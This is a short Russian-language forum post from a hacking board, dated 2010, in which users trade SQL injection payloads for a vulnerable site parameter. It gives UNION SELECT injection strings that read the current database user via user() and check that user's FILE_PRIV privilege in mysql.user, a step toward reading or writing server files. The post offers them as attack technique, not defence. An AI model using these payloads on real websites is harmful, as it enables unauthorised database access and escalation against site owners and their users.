Показать сообщение отдельно

  #2  
Старый 12.11.2010, 00:11
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию

Цитата:
Сообщение от pinch  
Проверяем права на запись и чтение файлов
id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='root'--
Y-есть права
N-нет прав
Сообщение от Mirrey
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Код:
select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--
Вы несколько не правы, так как может быть несколько юзеров и соответственно различные права, поэтому нужно узнать под кем мы сидим, для этого используется

id=1+union+select+1,2,3,4,user()--

а затем уже проверять конкретного

id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='наш юзер под которым сидим'--
 
Ответить с цитированием